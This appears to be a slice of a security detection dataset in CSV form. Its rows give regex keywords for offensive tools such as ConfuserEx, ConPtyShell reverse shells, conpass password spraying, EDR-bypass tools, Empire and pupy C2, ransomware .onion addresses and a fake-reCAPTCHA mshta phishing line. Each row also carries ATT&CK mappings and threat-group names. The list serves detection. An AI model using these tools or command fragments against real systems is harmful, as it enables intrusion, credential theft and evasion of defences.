"*Confuser.DynCipher.dll*",".{0,1000}Confuser\.DynCipher\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38754"
"*Confuser.Renamer.dll*",".{0,1000}Confuser\.Renamer\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38755"
"*ConfuserEx (CLI)*",".{0,1000}ConfuserEx\s\(CLI\).{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38756"
"*ConfuserEx Command-line*",".{0,1000}ConfuserEx\sCommand\-line.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38757"
"*ConfuserEx Core*",".{0,1000}ConfuserEx\sCore.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38758"
"*ConfuserEx Dynamic Cipher Library*",".{0,1000}ConfuserEx\sDynamic\sCipher\sLibrary.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38759"
"*ConfuserEx Protections*",".{0,1000}ConfuserEx\sProtections.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38760"
"*ConfuserEx Renamer*",".{0,1000}ConfuserEx\sRenamer.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38761"
"*ConfuserEx Runtime*",".{0,1000}ConfuserEx\sRuntime.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38762"
"*ConfuserEx.CLI: *",".{0,1000}ConfuserEx\.CLI\:\s.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38763"
"*Connect back to an * listener and relay the SOCKS5 traffic*",".{0,1000}Connect\sback\sto\san\s.{0,1000}\slistener\sand\srelay\sthe\sSOCKS5\straffic.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#content","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","38765"
"*connect.nachovpn.local*",".{0,1000}connect\.nachovpn\.local.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","38766"
"*Connect-AzureAD -AadAccessToken -AccountId *",".{0,1000}Connect\-AzureAD\s\-AadAccessToken\s\-AccountId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","38767"
"*connormcgarr/tgtdelegation*",".{0,1000}connormcgarr\/tgtdelegation.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","38772"
"*conpass -d * -u * -p *",".{0,1000}conpass\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","38773"
"*conpass v* - Continuous password spraying tool*",".{0,1000}conpass\sv.{0,1000}\s\-\sContinuous\spassword\sspraying\stool.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","38774"
"*conptyshell *",".{0,1000}conptyshell\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","38775"
"*ConPtyShell.cs*",".{0,1000}ConPtyShell\.cs.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38776"
"*ConPtyShell.exe*",".{0,1000}ConPtyShell\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38777"
"*ConPtyShell.git*",".{0,1000}ConPtyShell\.git.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38778"
"*ConPtyShell.zip*",".{0,1000}ConPtyShell\.zip.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38779"
"*ConPtyShell.zip*",".{0,1000}ConPtyShell\.zip.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38780"
"*ConPtyShell_dotnet2.exe*",".{0,1000}ConPtyShell_dotnet2\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38781"
"*Console.Write(""InexorablePoSH*",".{0,1000}Console\.Write\(\""InexorablePoSH.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","38782"
"*Console.WriteLine*self executing the payload*",".{0,1000}Console\.WriteLine.{0,1000}self\sexecuting\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","38783"
"*ConsoleHost_history.txt.jasmin*",".{0,1000}ConsoleHost_history\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","38784"
"*-consoleoutput -DomainRecon*",".{0,1000}\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","38785"
"*-consoleoutput -Localrecon*",".{0,1000}\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","38786"
"*const commandToRun = ""mshta "" + htaPath*",".{0,1000}const\scommandToRun\s\=\s\""mshta\s\""\s\+\shtaPath.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#content","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","38787"
"*const Name = ""tun2socks""*",".{0,1000}const\sName\s\=\s\""tun2socks\"".{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","38788"
"*const subscription_id = `TOPROXY_*",".{0,1000}const\ssubscription_id\s\=\s\`TOPROXY_.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","38789"
"*contact_harvester*",".{0,1000}contact_harvester.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38790"
"*ContainYourself.cpp*",".{0,1000}ContainYourself\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38792"
"*ContainYourself.exe*",".{0,1000}ContainYourself\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38793"
"*ContainYourself.sln*",".{0,1000}ContainYourself\.sln.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38794"
"*ContainYourself-main*",".{0,1000}ContainYourself\-main.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38795"
"*ContainYourselfPoc.cpp*",".{0,1000}ContainYourselfPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38796"
"*ContainYourselfPoc.exe*",".{0,1000}ContainYourselfPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38797"
"*ContainYourselfPoc\*",".{0,1000}ContainYourselfPoc\\.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38798"
"*ContainYourselfTempFile.txt*",".{0,1000}ContainYourselfTempFile\.txt.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38799"
"*ContentHijacking.swf*",".{0,1000}ContentHijacking\.swf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38800"
"*contirec7nchr45rx6ympez5rjldibnqzh7lsa56lvjvaeywhvoj3wad.onion*",".{0,1000}contirec7nchr45rx6ympez5rjldibnqzh7lsa56lvjvaeywhvoj3wad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38801"
"*contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion*",".{0,1000}contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38802"
"*contiuevxdgdhn3zl2kubpajtfgqq4ssj2ipv6ujw7fwhggev3rk6hqd.onion*",".{0,1000}contiuevxdgdhn3zl2kubpajtfgqq4ssj2ipv6ujw7fwhggev3rk6hqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38803"
"*convert_ccache_to_kirbi*",".{0,1000}\?convert_ccache_to_kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38807"
"*convert_kirbi_to_ccache*",".{0,1000}\?convert_kirbi_to_ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38808"
"*Convert-ADCSFlag *",".{0,1000}Convert\-ADCSFlag\s.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","38809"
"*Convert-ADCSPrivateKeyFlag*",".{0,1000}Convert\-ADCSPrivateKeyFlag.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","38810"
"*ConvertFrom-CSV $attacksCSV*",".{0,1000}ConvertFrom\-CSV\s\$attacksCSV.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#content","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","38811"
"*ConvertFrom-LDAPLogonHours*",".{0,1000}ConvertFrom\-LDAPLogonHours.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38812"
"*ConvertFrom-UACValue*",".{0,1000}ConvertFrom\-UACValue.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","38813"
"*Converting and saving TGT in UNIX format to file wce_ccache*",".{0,1000}Converting\sand\ssaving\sTGT\sin\sUNIX\sformat\sto\sfile\swce_ccache.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","38814"
"*Convert-NetToLua -infile *",".{0,1000}Convert\-NetToLua\s\-infile\s.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","38815"
"*Convert-NetToLua.ps1*",".{0,1000}Convert\-NetToLua\.ps1.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","1","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","38816"
